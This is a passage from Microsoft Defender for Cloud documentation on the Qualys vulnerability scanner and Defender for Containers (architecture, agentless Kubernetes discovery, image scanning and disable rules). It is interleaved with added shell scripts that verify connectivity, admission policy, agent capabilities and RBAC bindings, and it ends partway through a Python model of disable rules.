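#!/usr/bin/env bash
# Added example (not Microsoft's or Qualys's code): verify the Qualys extension's
# outbound prerequisites from the VM itself. Hostnames are from the FAQ above;
# function names and the provisioningState check are assumptions of this example.

QUALYS_ENDPOINTS="https://qagpublic.qg3.apps.qualys.com https://qagpublic.qg2.apps.qualys.eu"

# Pure check: the expected answer from a Qualys endpoint is an HTTP 404 whose JSON
# body carries "code":404. Anything else (captive portal, TLS-inspecting proxy serving
# its own page, a 200 after a redirect) means the agent is not talking to Qualys.
qualys_response_ok() {
  code="$1"; body="$2"
  [ "$code" = "404" ] || return 1
  case "$body" in
    *'"code":404'*) return 0 ;;
    *) return 1 ;;
  esac
}

# Map the curl exit codes that matter here to the prerequisite they violate.
explain_curl_exit() {
  case "$1" in
    0)  echo "ok" ;;
    6)  echo "DNS: could not resolve host" ;;
    7)  echo "TCP: could not connect on 443 (NSG or firewall?)" ;;
    28) echo "timeout: no answer on 443" ;;
    35) echo "TLS: handshake failed (proxy or TLS interception?)" ;;
    60) echo "TLS: server certificate not trusted by the local CA store" ;;
    *)  echo "curl exit $1" ;;
  esac
}

# Live check of one endpoint: DNS first, then an HTTPS GET with certificate validation on.
check_qualys_endpoint() {
  url="$1"
  host="${url#https://}"; host="${host%%/*}"
  if command -v getent >/dev/null 2>&1 && ! getent hosts "$host" >/dev/null; then
    echo "FAIL $host: DNS resolution failed"; return 1
  fi
  tmp="$(mktemp)"
  code="$(curl -sS --max-time 15 -o "$tmp" -w '%{http_code}' "$url" 2>/dev/null)"
  rc=$?
  body="$(cat "$tmp")"; rm -f "$tmp"
  if [ "$rc" -ne 0 ]; then
    echo "FAIL $host: $(explain_curl_exit "$rc")"; return 1
  fi
  if qualys_response_ok "$code" "$body"; then
    echo "OK   $host: HTTP $code $body"
  else
    echo "FAIL $host: unexpected HTTP $code: $(printf '%s' "$body" | head -c 120)"; return 1
  fi
}

# Optional: confirm the extension itself reports Succeeded (needs Azure CLI and RBAC).
# Usage: qualys_extension_state <resource-group> <vm-name> linux|windows
qualys_extension_state() {
  name=LinuxAgent.AzureSecurityCenter
  if [ "$3" = "windows" ]; then name=WindowsAgent.AzureSecurityCenter; fi
  az vm extension show -g "$1" --vm-name "$2" -n "$name" --query provisioningState -o tsv
}

# Live checks run only when invoked with "check"; sourcing the file just defines functions.
if [ "${1:-}" = "check" ]; then
  status=0
  for ep in $QUALYS_ENDPOINTS; do check_qualys_endpoint "$ep" || status=1; done
  exit $status
fi
```

Run it as `sh qualys-check.sh check` on the VM itself, since that is the agent's egress path, not your workstation. A 200 with an HTML body, or curl exit 60, usually means a TLS-inspecting proxy or captive portal sits between the VM and Qualys; because the extension takes no proxy settings, that has to be addressed through the Qualys agent's local proxy configuration described above.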


How does the extension get updated? 


Like the Microsoft Defender for Cloud agent itself and all other Azure extensions, minor 
updates of the Qualys scanner might automatically happen in the background. All 
agents and extensions are tested extensively before being automatically deployed. 


Why does my machine show as "not applicable" in the recommendation? 

If you have machines in the not applicable resources group, Defender for Cloud can't 
deploy the vulnerability scanner extension on those machines because: 

• The vulnerability scanner included with Microsoft Defender for Cloud is only 
  available for machines protected by Microsoft Defender for Servers. 
• It's a PaaS resource, such as an image in an AKS cluster or part of a virtual machine 
  scale set. 
• It's not running one of the supported operating systems. 


Can the built-in vulnerability scanner find vulnerabilities on the VM's network? 

No. The scanner runs on your machine to look for vulnerabilities of the machine itself, 
not for your network. 


Does the scanner integrate with my existing Qualys console? 


The Defender for Cloud extension is a separate tool from your existing Qualys scanner. 
Licensing restrictions mean that it can only be used within Microsoft Defender for Cloud. 


How quickly will the scanner identify newly disclosed critical vulnerabilities? 


Within 48 hours of the disclosure of a critical vulnerability, Qualys incorporates the 
information into their processing and can identify affected machines. 


If I deploy a Qualys agent, what communications settings are required? 

The Qualys Cloud Agent is designed to communicate with Qualys's SOC at regular 
intervals for updates, and to perform the various operations required for product 
functionality. To allow the agent to communicate seamlessly with the SOC, configure 
your network security to allow inbound and outbound traffic to the Qualys SOC CIDR 
and URLs. 

There are multiple Qualys platforms across various geographic locations. The SOC CIDR 
and URLs differ depending on the host platform of your Qualys subscription. Identify 
your Qualys host platform. 


Why do I have to specify a resource group when configuring a Bring Your Own License (BYOL) solution? 


When you set up your solution, you must choose a resource group to attach it to. The 
solution isn't an Azure resource, so it won't be included in the list of the resource 
group’s resources. Nevertheless, it's attached to that resource group. If you later delete 
the resource group, the BYOL solution is unavailable. 


Overview of Microsoft Defender for Containers 

Microsoft Defender for Containers is the cloud-native solution to improve, monitor, and 
maintain the security of your clusters, containers, and their applications. 

Defender for Containers assists you with four core aspects of container security: 

• Environment hardening - Defender for Containers protects your Kubernetes 
  clusters whether they're running on Azure Kubernetes Service, Kubernetes on- 
  premises/IaaS, or Amazon EKS. Defender for Containers continuously assesses 
  clusters to provide visibility into misconfigurations and guidelines to help mitigate 
  identified threats. 
• Vulnerability assessment - Vulnerability assessment and management tools for 
  images stored in Azure Container Registry and Elastic Container Registry. 
• Run-time threat protection for nodes and clusters - Threat protection for clusters 
  and nodes generates security alerts for suspicious activities. 
• Agentless discovery for Kubernetes - Provides tools that give you visibility into 
  your data plane components, generating security insights based on your 
  Kubernetes and environment configuration, and lets you hunt for risks. 


You can learn more by watching this video from the Defender for Cloud in the Field 
video series: Microsoft Defender for Containers. 


Microsoft Defender for Containers plan availability 

Aspect                          Details 

Release state:                  General availability (GA). Certain features are in preview; 
                                for a full list see the availability section. 

Feature availability:           Refer to the availability section for additional information 
                                on feature release state and availability. 

Pricing:                        Microsoft Defender for Containers is billed as shown on the 
                                pricing page. 

Required roles and permissions: • To deploy the required components, see the permissions 
                                  for each of the components 
                                • Security admin can dismiss alerts 
                                • Security reader can view vulnerability assessment findings 
                                See also Roles for remediation and Azure Container Registry 
                                roles and permissions. 

Clouds:                         Azure: 
                                ✔ Commercial clouds 
                                ✔ National clouds (Azure Government, Microsoft Azure 
                                  operated by 21Vianet) (except for preview features) 
                                Non-Azure: 
                                ✔ Connected AWS accounts (Preview) 
                                ✔ Connected GCP projects (Preview) 
                                ✔ On-prem/IaaS supported via Arc-enabled Kubernetes (Preview) 

For more information, see the availability section. 

Hardening 


Continuous monitoring of your Kubernetes clusters - 
wherever they're hosted 


Defender for Cloud continuously assesses the configurations of your clusters and 
compares them with the initiatives applied to your subscriptions. When it finds 
misconfigurations, Defender for Cloud generates security recommendations that are 
available on Defender for Cloud's Recommendations page. The recommendations let 
you investigate and remediate issues. 

You can use the resource filter to review the outstanding recommendations for your 
container-related resources, whether in asset inventory or the recommendations page: 


[Screenshot: Microsoft Defender for Cloud > Recommendations page, with the Resource 
type filter available next to Recommendation status and Severity; the page shows the 
secure score summary and the recommendation list with Max score, Current score and 
Potential score columns.] 


For details on the recommendations that might appear for this feature, check out the 
compute section of the recommendations reference table. 


Kubernetes data plane hardening 


To protect the workloads of your Kubernetes containers with tailored recommendations, 
you can install the Azure Policy for Kubernetes. Learn more about monitoring 
components for Defender for Cloud. 


With the add-on on your AKS cluster, every request to the Kubernetes API server will be 
monitored against the predefined set of best practices before being persisted to the 
cluster. You can then configure it to enforce the best practices and mandate them for 
future workloads. 


For example, you can mandate that privileged containers shouldn't be created, and any 
future requests to do so will be blocked. 


You can learn more about Kubernetes data plane hardening. 
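To check that the add-on actually enforces the "no privileged containers" practice on a cluster, the following added example (not part of the original article, and not Microsoft's code) submits a privileged and an unprivileged pod with `kubectl apply --dry-run=server`. Server-side dry run passes the object through admission control, including Gatekeeper's validating webhook, and then discards it, so nothing is created. The pod name, the image placeholder, the namespace and the function names are this example's assumptions.

```shell
#!/usr/bin/env bash
# Added example (not Microsoft's code): probe whether the Azure Policy for Kubernetes
# add-on on the current kubectl context blocks privileged containers, without creating
# anything. Names, namespace and image placeholder are assumptions of this example.

NAMESPACE="${NAMESPACE:-default}"

# Emit a minimal pod manifest. With "true" it is the request that the
# "privileged containers shouldn't be created" policy is expected to reject.
pod_manifest() {
  privileged="$1"
  cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: policy-probe-$privileged
  namespace: $NAMESPACE
spec:
  containers:
  - name: probe
    image: probe:placeholder   # never pulled: the object is discarded after admission
    command: ["sleep", "3600"]
    securityContext:
      privileged: $privileged
      allowPrivilegeEscalation: $privileged
EOF
}

# Classify the admission outcome from kubectl's exit code and stderr.
# Gatekeeper denials surface as 'admission webhook "..." denied the request'.
classify_admission() {
  rc="$1"; stderr="$2"
  if [ "$rc" -eq 0 ]; then
    echo "allowed"
  elif printf '%s' "$stderr" | grep -q "denied the request"; then
    echo "denied"
  else
    echo "error"      # not an admission decision: auth, connectivity, bad manifest
  fi
}

# Submit one manifest with server-side dry run and report allowed/denied/error.
probe_privileged() {
  privileged="$1"
  err="$(pod_manifest "$privileged" | kubectl apply --dry-run=server -f - 2>&1 >/dev/null)"
  rc=$?
  verdict="$(classify_admission "$rc" "$err")"
  echo "privileged=$privileged -> $verdict"
  if [ "$verdict" = "error" ]; then printf '%s\n' "$err" >&2; fi
}

# Run only when asked. With the policy in enforce (deny) mode the expected result is
# "privileged=true -> denied" and "privileged=false -> allowed"; in audit mode both are
# allowed and the violation appears as a recommendation instead of a rejection.
if [ "${1:-}" = "probe" ]; then
  probe_privileged true
  probe_privileged false
fi
```

Run `sh policy-probe.sh probe` against the cluster's kubeconfig context. Because the unprivileged pod is submitted too, a "denied" for both would point at some other policy (for example an allowed-registries constraint rejecting the placeholder image) rather than at the privileged-container rule.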


Vulnerability assessment 


Defender for Containers scans the container images in Azure Container Registry (ACR) 
and Amazon AWS Elastic Container Registry (ECR) to provide vulnerability reports for 
your container images, providing details for each vulnerability detected, remediation 
guidance, real-world exploit insights, and more. 


There are two solutions for vulnerability assessment in Azure, one powered by Microsoft 
Defender Vulnerability Management and one powered by Qualys. 

Learn more about: 

• Vulnerability assessments for Azure with Microsoft Defender Vulnerability 
  Management 
• Vulnerability assessment for Azure powered by Qualys 
• Vulnerability assessment for Amazon AWS Elastic Container Registry (ECR) 


Run-time protection for Kubernetes nodes and clusters 

Defender for Containers provides real-time threat protection for supported 
containerized environments and generates alerts for suspicious activities. You can use 
this information to quickly remediate security issues and improve the security of your 
containers. 

Threat protection at the cluster level is provided by the Defender agent and analysis of 
the Kubernetes audit logs. This means that security alerts are only triggered for actions 
and deployments that occur after you've enabled Defender for Containers on your 
subscription. 

Examples of security events that Microsoft Defender for Containers monitors include: 

• Exposed Kubernetes dashboards 
• Creation of high privileged roles 
• Creation of sensitive mounts 

You can view security alerts by selecting the Security alerts tile at the top of the 
Defender for Cloud's overview page, or the link from the sidebar. 


[Screenshot: Microsoft Defender for Cloud > Overview page. The Security alerts tile 
(alerts by severity over time) sits alongside the Secure score, Regulatory compliance, 
Inventory and Workload protections tiles.] 


The security alerts page opens. 


[Screenshot: Microsoft Defender for Cloud > Security alerts page, filtered to Resource 
type == Kubernetes Service, Arc Kubernetes service and Status == Active, In Progress. 
Example alerts shown: "Exposed Kubernetes dashboard detected" (High; MITRE ATT&CK 
tactic: Initial Access) and "Container with a miner image detected" (High; Execution).] 


Security alerts for runtime workloads in the clusters can be recognized by the K8S.NODE_ 
prefix of the alert type. For a full list of the cluster level alerts, see the reference table of 
alerts. 

Defender for Containers also includes host-level threat detection with over 60 
Kubernetes-aware analytics, AI, and anomaly detections based on your runtime 
workload. 

Defender for Cloud monitors the attack surface of multicloud Kubernetes deployments 
based on the MITRE ATT&CK® matrix for Containers, a framework developed by the 
Center for Threat-Informed Defense in close partnership with Microsoft. 


Agentless discovery for Kubernetes 

Defender for Containers uses the cloud security graph to collect information about your 
Kubernetes clusters in an agentless manner. This data can be queried via Cloud Security 
Explorer and used for: 

1. Kubernetes inventory: gain visibility into your Kubernetes clusters' data plane 
   components such as nodes, pods, and cron jobs. 
2. Security insights: predefined security situations relevant to Kubernetes 
   components, such as "exposed to the internet". For more information, see Security 
   insights. 
3. Risk hunting: querying various risk cases, correlating predefined or custom security 
   scenarios across fine-grained Kubernetes properties as well as Defender for 
   Containers security insights. 

[Screenshot: Cloud Security Explorer query builder.] 


Learn more 

Learn more about Defender for Containers in the following blogs: 

• Introducing Microsoft Defender for Containers 
• Demonstrating Microsoft Defender for Cloud 


The release state of Defender for Containers is broken down by two dimensions: 
environment and feature. So, for example: 


• Kubernetes data plane recommendations for AKS clusters are GA 
• Kubernetes data plane recommendations for EKS clusters are preview 


To view the status of the full matrix of features and environments, see Microsoft 
Defender for Containers feature availability. 


Next steps 


In this overview, you learned about the core elements of container security in Microsoft 
Defender for Cloud. To enable the plan, see: 


• Enable Defender for Containers 
• Check out common questions about Defender for Containers. 


Defender for Containers architecture 

Defender for Containers is designed differently for each Kubernetes environment, 
whether it's running in: 

• Azure Kubernetes Service (AKS) - Microsoft's managed service for developing, 
  deploying, and managing containerized applications. 
• Amazon Elastic Kubernetes Service (EKS) in a connected Amazon Web Services 
  (AWS) account - Amazon's managed service for running Kubernetes on AWS 
  without needing to install, operate, and maintain your own Kubernetes control 
  plane or nodes. 
• Google Kubernetes Engine (GKE) in a connected Google Cloud Platform (GCP) 
  project - Google's managed environment for deploying, managing, and scaling 
  applications using GCP infrastructure. 
• An unmanaged Kubernetes distribution (using Azure Arc-enabled Kubernetes) - 
  Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters hosted 
  on-premises or on IaaS. 

Note 
Defender for Containers support for Arc-enabled Kubernetes clusters (AWS EKS and 
GCP GKE) is a preview feature. 

To protect your Kubernetes containers, Defender for Containers receives and analyzes: 

• Audit logs and security events from the API server 
• Cluster configuration information from the control plane 
• Workload configuration from Azure Policy 
• Security signals and events from the node level 


To learn more about implementation details such as supported operating systems, 
feature availability, outbound proxy, see Defender for Containers feature availability. 


Architecture for each Kubernetes environment 


Azure (AKS) 


[Diagram: architecture of Defender for Cloud and AKS clusters] 

When Defender for Cloud protects a cluster hosted in Azure Kubernetes Service, the 
collection of audit log data is agentless and collected automatically through Azure 
infrastructure with no additional cost or configuration considerations. These are the 
required components in order to receive the full protection offered by Microsoft 
Defender for Containers: 

• Defender agent: The DaemonSet that is deployed on each node, collects 
  signals from hosts using eBPF technology, and provides runtime protection. 
  The agent is registered with a Log Analytics workspace, which is used as a data 
  pipeline. However, the audit log data isn't stored in the Log Analytics 
  workspace. The Defender agent is deployed as an AKS Security profile. 
• Azure Policy for Kubernetes: A pod that extends the open-source 
  Gatekeeper v3 and registers as a webhook to Kubernetes admission control, 
  making it possible to apply at-scale enforcements and safeguards on your 
  clusters in a centralized, consistent manner. The Azure Policy for Kubernetes 
  pod is deployed as an AKS add-on. For more information, see Protect your 
  Kubernetes workloads and Understand Azure Policy for Kubernetes clusters. 


Microsoft Defender for Containers — AKS clusters 

Defender agent component details 

Pod name:           microsoft-defender-collector-ds-* 
Namespace:          kube-system 
Kind:               DaemonSet 
Short description:  A set of containers that focus on collecting inventory and security 
                    events from the Kubernetes environment. 
Capabilities:       SYS_ADMIN, SYS_RESOURCE, SYS_PTRACE 
Resource limits*:   memory: 296Mi, cpu: 360m 
Egress required:    No 

Pod name:           microsoft-defender-collector-misc-* 
Namespace:          kube-system 
Kind:               Deployment 
Short description:  A set of containers that focus on collecting inventory and security 
                    events from the Kubernetes environment that aren't bound to a 
                    specific node. 
Capabilities:       N/A 
Resource limits*:   memory: 64Mi, cpu: 60m 
Egress required:    No 

Pod name:           microsoft-defender-publisher-ds-* 
Namespace:          kube-system 
Kind:               DaemonSet 
Short description:  Publishes the collected data to the Microsoft Defender for 
                    Containers backend service, where the data is processed and 
                    analyzed. 
Capabilities:       N/A 
Resource limits*:   memory: 200Mi, cpu: 60m 
Egress required:    HTTPS 443. Learn more about the outbound access prerequisites. 

* Resource limits aren't configurable; learn more about Kubernetes resource limits. 
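The following added example (not Microsoft's code) checks a cluster against the table above with kubectl: that the three workloads exist in kube-system, that the collector DaemonSet adds exactly the documented SYS_ADMIN, SYS_RESOURCE and SYS_PTRACE capabilities and the other two add none, and which limits are set. The workload names are assumed from the pod-name prefixes in the table (the table lists pod names, not DaemonSet or Deployment names), and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not Microsoft's code): compare what is actually running in kube-system
# with the Defender agent component table. Workload names are assumed from the pod-name
# prefixes in the table (collector-ds and publisher-ds DaemonSets, collector-misc Deployment).

NS=kube-system

# Pure helper: print each expected capability that is absent from the actual list.
# Both arguments are whitespace-separated capability names.
missing_caps() {
  expected="$1"; actual="$2"
  for cap in $expected; do
    case " $actual " in
      *" $cap "*) ;;
      *) echo "$cap" ;;
    esac
  done
}

# Pure helper: capabilities beyond the documented set. Extra capabilities on a workload
# with this name mean a changed agent or a lookalike planted in kube-system.
extra_caps() { missing_caps "$2" "$1"; }

# Live: capability adds and limits of a workload, read from the API server.
workload_caps() {
  kubectl -n "$NS" get "$1" "$2" \
    -o jsonpath='{.spec.template.spec.containers[*].securityContext.capabilities.add[*]}'
}
workload_limits() {
  kubectl -n "$NS" get "$1" "$2" \
    -o jsonpath='{range .spec.template.spec.containers[*]}{.name}: cpu={.resources.limits.cpu} memory={.resources.limits.memory}{"\n"}{end}'
}

# Check one workload: presence, capability drift in either direction, and limits.
check_component() {
  kind="$1"; name="$2"; expected_caps="$3"
  if ! kubectl -n "$NS" get "$kind" "$name" >/dev/null 2>&1; then
    echo "MISSING $kind/$name"; return 1
  fi
  actual="$(workload_caps "$kind" "$name")"
  m="$(missing_caps "$expected_caps" "$actual" | xargs)"
  x="$(extra_caps "$expected_caps" "$actual" | xargs)"
  status=OK
  if [ -n "$m$x" ]; then status=DRIFT; fi
  echo "$status $kind/$name caps=[${actual:-none}] missing=[${m:-none}] extra=[${x:-none}]"
  workload_limits "$kind" "$name" | sed 's/^/    /'
  [ "$status" = OK ]
}

if [ "${1:-}" = "check" ]; then
  rc=0
  check_component daemonset  microsoft-defender-collector-ds   "SYS_ADMIN SYS_RESOURCE SYS_PTRACE" || rc=1
  check_component deployment microsoft-defender-collector-misc ""                                  || rc=1
  check_component daemonset  microsoft-defender-publisher-ds   ""                                  || rc=1
  exit $rc
fi
```

Run `sh defender-agent-check.sh check` against the cluster. Capabilities reported as missing mean the collector cannot do the eBPF-based collection described above; capabilities reported as extra mean something other than the documented agent is running under that name. Keep any admission policy that forbids these capabilities scoped away from kube-system, or the agent's own pods will be rejected.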


How does agentless discovery for Kubernetes work? 

The discovery process is based on snapshots taken at intervals: 

[Diagram: Enable agentless discovery for Kubernetes → Create a managed identity → 
Assign a built-in role: Kubernetes Agentless Operator → Discover AKS clusters in your 
environment → Trusted Access: bind the Kubernetes role to the managed identity on 
each Kubernetes cluster.] 

When you enable the agentless discovery for Kubernetes extension, the following 
process occurs: 

• Create: 
  ◦ If the extension is enabled from Defender CSPM, Defender for Cloud creates an 
    identity in customer environments called 
    CloudPosture/securityOperator/DefenderCSPMSecurityOperator. 
  ◦ If the extension is enabled from Defender for Containers, Defender for Cloud 
    creates an identity in customer environments called 
    CloudPosture/securityOperator/DefenderForContainersSecurityOperator. 

• Assign: Defender for Cloud assigns a built-in role called Kubernetes Agentless 
  Operator to that identity on subscription scope. The role contains the following 
  permissions: 
  ◦ AKS read (Microsoft.ContainerService/managedClusters/read) 
  ◦ AKS Trusted Access with the following permissions: 
    ◦ Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/write 
    ◦ Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/read 
    ◦ Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/delete 

  Learn more about AKS Trusted Access. 

• Discover: Using the system-assigned identity, Defender for Cloud performs a 
  discovery of the AKS clusters in your environment using API calls to the API server 
  of AKS. 

• Bind: Upon discovery of an AKS cluster, Defender for Cloud performs an AKS bind 
  operation between the created identity and the Kubernetes role 
  "Microsoft.Security/pricings/microsoft-defender-operator". The role is visible via API 
  and gives Defender for Cloud data plane read permission inside the cluster. 
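The create/assign/discover/bind sequence above leaves auditable artifacts in the subscription. The following added example (not Microsoft's code) checks them with Azure CLI: that the built-in role still carries exactly the four documented actions, which principals hold it at subscription scope, and which AKS clusters carry a Trusted Access binding for the Defender role. The role, action and binding names are taken from the text above; the function names are this example's own, and the commands are standard az commands.

```shell
#!/usr/bin/env bash
# Added example (not Microsoft's code): audit what agentless discovery for Kubernetes
# created in a subscription: the built-in role's actions, who holds it, and the
# per-cluster Trusted Access bindings. Function names are this example's own.

ROLE_NAME="Kubernetes Agentless Operator"
REQUIRED_ACTIONS="Microsoft.ContainerService/managedClusters/read
Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/write
Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/read
Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/delete"
TRUSTED_ROLE="Microsoft.Security/pricings/microsoft-defender-operator"

# Pure helper: print required actions that are not in the given newline-separated list.
# Matching is exact: a wildcard such as Microsoft.ContainerService/*/read would show as
# missing on purpose, because the built-in role is documented with literal actions.
missing_actions() {
  granted="$1"
  printf '%s\n' "$REQUIRED_ACTIONS" | while IFS= read -r action; do
    printf '%s\n' "$granted" | grep -qxF "$action" || echo "$action"
  done
}

# Pure helper: does a newline-separated list of trusted access roles include Defender's?
binding_has_defender_role() {
  printf '%s\n' "$1" | grep -qxF "$TRUSTED_ROLE"
}

# Live: actions of the built-in role as seen by Azure RBAC, one per line.
role_actions() {
  az role definition list --name "$ROLE_NAME" --query "[0].permissions[0].actions" -o tsv
}

# Live: principals holding the role at subscription scope (expect only Defender's identity).
role_holders() {
  az role assignment list --role "$ROLE_NAME" --scope "/subscriptions/$1" \
    --query "[].{principal:principalName,type:principalType}" -o tsv
}

# Live: trusted access roles bound on one AKS cluster, one role per line.
cluster_trusted_roles() {
  az aks trustedaccess rolebinding list -g "$1" --cluster-name "$2" --query "[].roles[]" -o tsv
}

if [ "${1:-}" = "audit" ]; then
  sub="$(az account show --query id -o tsv)"
  echo "== $ROLE_NAME: missing actions (none expected):"
  missing_actions "$(role_actions)"
  echo "== holders of $ROLE_NAME in subscription $sub:"
  role_holders "$sub"
  echo "== Trusted Access binding for $TRUSTED_ROLE per cluster:"
  az aks list --query "[].[resourceGroup,name]" -o tsv | while IFS="$(printf '\t')" read -r rg name; do
    if binding_has_defender_role "$(cluster_trusted_roles "$rg" "$name")"; then
      echo "BOUND   $rg/$name"
    else
      echo "UNBOUND $rg/$name (not yet discovered, or binding removed)"
    fi
  done
fi
```

Run `sh agentless-audit.sh audit` with an identity that can read role definitions, role assignments and AKS resources. A second, unexpected holder of Kubernetes Agentless Operator is worth investigating: with the trustedAccessRoleBindings/write action at subscription scope, that holder can create Trusted Access bindings on every cluster in the subscription.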


Next steps 


In this overview, you learned about the architecture of container security in Microsoft 
Defender for Cloud. To enable the plan, see: 


Enable Defender for Containers 


Vulnerability assessment for Azure 
powered by Qualys 


Article e 09/06/2023 


Vulnerability assessment for Azure, powered by Qualys, is an out-of-box solution that 
empowers security teams to easily discover and remediate vulnerabilities in Linux 
container images, with zero configuration for onboarding, and without deployment of 
any agents. 


O Note 


This feature supports scanning of images in the Azure Container Registry (ACR) 
only. If you want to find vulnerabilities stored in other container registries, you can 
import the images into ACR, after which the imported images are scanned by the 
built-in vulnerability assessment solution. Learn how to import container images to 
a container registry. 


In every subscription where this capability is enabled, all images stored in ACR (existing 
and new) are automatically scanned for vulnerabilities without any extra configuration of 
users or registries. Recommendations with vulnerability reports are provided for all 
images in ACR as well as images that are currently running in AKS that were pulled from 
an ACR registry. Images are scanned shortly after being added to a registry, and 
rescanned for new vulnerabilities once every week. 


Container vulnerability assessment powered by Qualys has the following capabilities: 


• Scanning OS packages - container vulnerability assessment can scan vulnerabilities
in packages installed by the OS package manager in Linux. See the full list of the
supported OS and their versions.


• Language specific packages — support for language specific packages and files,
and their dependencies installed or copied without the OS package manager. See
the full list of supported languages.


• Image scanning in Azure Private Link - Azure container vulnerability assessment
provides the ability to scan images in container registries that are accessible via
Azure Private Links. This capability requires access to trusted services and
authentication with the registry. Learn how to allow access by trusted services.


• Reporting - Container Vulnerability Assessment for Azure powered by Qualys
provides vulnerability reports using the following recommendations:

  Recommendation: Container registry images should have vulnerability findings
  resolved (powered by Qualys)
  Description: Container image vulnerability assessment scans your registry for
  security vulnerabilities and exposes detailed findings for each image. Resolving the
  vulnerabilities can greatly improve your containers' security posture and protect
  them from attacks.
  Assessment key: dbd0cb49-b563-45e7-9724-889e799fa648

  Recommendation: Running container images should have vulnerability findings
  resolved (powered by Qualys)
  Description: Container image vulnerability assessment scans container images
  running on your Kubernetes clusters for security vulnerabilities and exposes detailed
  findings for each image. Resolving the vulnerabilities can greatly improve your
  containers' security posture and protect them from attacks.
  Assessment key: 41503391-efa5-47ee-9282-4eff6131462c


• Query vulnerability information via the Azure Resource Graph - Ability to query
vulnerability information via the Azure Resource Graph. Learn how to query
recommendations via the ARG.


• Query vulnerability information via sub-assessment API - You can get scan results
via REST API. See the subassessment list.


• Support for exemptions - Learn how to create exemption rules for a management
group, resource group, or subscription.


• Support for disabling vulnerability findings - Learn how to disable vulnerability
assessment findings on Container registry images.


Scan triggers


• One-time triggering

  ◦ Each image pushed/imported to a container registry is scanned shortly after
    being pushed to a registry. In most cases, the scan is completed within a few
    minutes, but sometimes it may take up to an hour.

  ◦ Each image pulled from a container registry is scanned if it wasn't scanned in
    the last seven days.


• Continuous rescan triggering — Continuous rescan is required to ensure images
that have been previously scanned for vulnerabilities are rescanned to update their
vulnerability reports in case a new vulnerability is published.

  ◦ Rescan is performed once every 7 days for:
    ◦ images pulled in the last 30 days
    ◦ images currently running on the Kubernetes clusters monitored by the
      Defender agent


Prerequisites 


Before you can scan your ACR images, you must enable the Defender for Containers
plan on your subscription.


For a list of the types of images and container registries supported by Microsoft 
Defender for Containers, see Availability. 


View and remediate findings 


1. To view the findings, open the Recommendations page. If issues are found, you'll
see the recommendation Container registry images should have vulnerability
findings resolved (powered by Qualys).


[Screenshot: Recommendations page listing "Container registry images should have
vulnerability findings resolved"]


2. Select the recommendation.


The recommendation details page opens with additional information. This
information includes the list of registries with vulnerable images ("Affected
resources") and the remediation steps.


3. Select a specific registry to see the repositories in it that have vulnerable
images.


[Screenshot: recommendation details page for "Container registry images should have
vulnerability findings resolved", with the Exempt, Disable rule, View policy definition
and Open query actions, and the Affected resources tab listing unhealthy registries
with their vulnerabilities by severity]


The registry details page opens with the list of affected repositories. 


4. Select a specific repository to see the images in it that are vulnerable.


[Screenshot: registry details page for imagescanprivatepreview showing vulnerable
images by severity and the Unhealthy repositories tab]


The repository details page opens. It lists the vulnerable images together with an 
assessment of the severity of the findings. 


5. Select a specific image to see the vulnerabilities. 


[Screenshot: repository details page listing the unhealthy images with their scan
report time]


The list of findings for the selected image opens. 


[Screenshot: image security health page for image 2e7c9245e5fd (dotnet/core/sdk)
showing the image digest, tags and OS, and the findings by severity, ID, security
check and category]


6. To learn more about a finding, select the finding. 


The findings details pane opens. 


[Screenshot: findings details pane for 178369 Debian Security Update for tzdata:
severity High, type Vulnerability, patchable Yes, CVSS 3.0 base score 5.3,
remediation referring to Debian security advisory DLA 2424-1, and the affected
images]


This pane includes a detailed description of the issue and links to external 
resources to help mitigate the threats. 


7. Follow the steps in the remediation section of this pane. 


8. When you've taken the steps required to remediate the security issue, replace the 
image in your registry: 


a. Push the updated image to trigger a scan. 


b. Check the recommendations page for the recommendation Container registry
images should have vulnerability findings resolved (powered by Qualys).


If the recommendation still appears and the image you've handled still appears 
in the list of vulnerable images, check the remediation steps again. 


c. When you're sure the updated image has been pushed, scanned, and is no 
longer appearing in the recommendation, delete the “old” vulnerable image 
from your registry. 


Disable specific findings 


Note


The Azure Preview Supplemental Terms include additional legal terms that apply
to Azure features that are in beta, preview, or otherwise not yet released into
general availability.


If you have an organizational need to ignore a finding, rather than remediate it, you can
optionally disable it. Disabled findings don't affect your secure score or generate
unwanted noise.


When a finding matches the criteria you've defined in your disable rules, it doesn't 
appear in the list of findings. Typical scenarios include: 


• Disable findings with severity below medium

• Disable findings that are nonpatchable

• Disable findings with CVSS score below 6.5

• Disable findings with specific text in the security check or category (for example:
"RedHat" or "CentOS Security Update for sudo")


Important
To create a rule, you need permissions to edit a policy in Azure Policy.


Learn more in Azure RBAC permissions in Azure Policy.


You can use any of the following criteria: 


• Finding ID

• CVE

• Category

• Security check

• CVSS v3 scores

• Severity

• Patchable status


To create a rule: 


1. From the recommendations detail page for Container registry images should have
vulnerability findings resolved (powered by Qualys), select Disable rule.


2. Select the relevant scope. 


[Screenshot: Disable rule pane showing the scope and the criteria fields Categories,
Security checks, CVSS score less than, Minimum severity and Non-patchable; the pane
notes that new disable rules can take up to 24 hours to apply]


3. Define your criteria. 
4. Select Apply rule. 


5. To view, override, or delete a rule:
a. Select Disable rule.


b. From the scope list, subscriptions with active rules appear as Rule applied.


[Screenshot: Disable rule scope list showing subscriptions marked Rule applied, with
View rule and Delete rule available from the ellipsis menu]


c. To view or delete the rule, select the ellipsis menu ("...").
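To make the disable-rule semantics concrete, here is an added Python model (not Defender for Cloud code) of how the criteria listed above are evaluated: a finding is disabled when it matches any populated criterion, and the rest stay active. The Finding fields follow what the findings details pane displays; the tzdata row mirrors the finding shown above, while the other sample findings, their scores and the CVE placeholder are constructed.

```python
from dataclasses import dataclass, field
from typing import Iterable, Optional

# Severity order for the "minimum severity" criterion (findings below it are disabled).
SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3}


@dataclass(frozen=True)
class Finding:
    """One vulnerability finding, with the fields the findings pane displays."""
    finding_id: str
    security_check: str
    category: str
    severity: str            # "Low", "Medium" or "High"
    cvss: float              # CVSS 3.0 base score
    patchable: bool
    cves: tuple = ()         # CVE identifiers, if the scanner reports any


@dataclass
class DisableRule:
    """Criteria of a disable rule. A finding is disabled when it matches ANY
    populated criterion, as the portal form states."""
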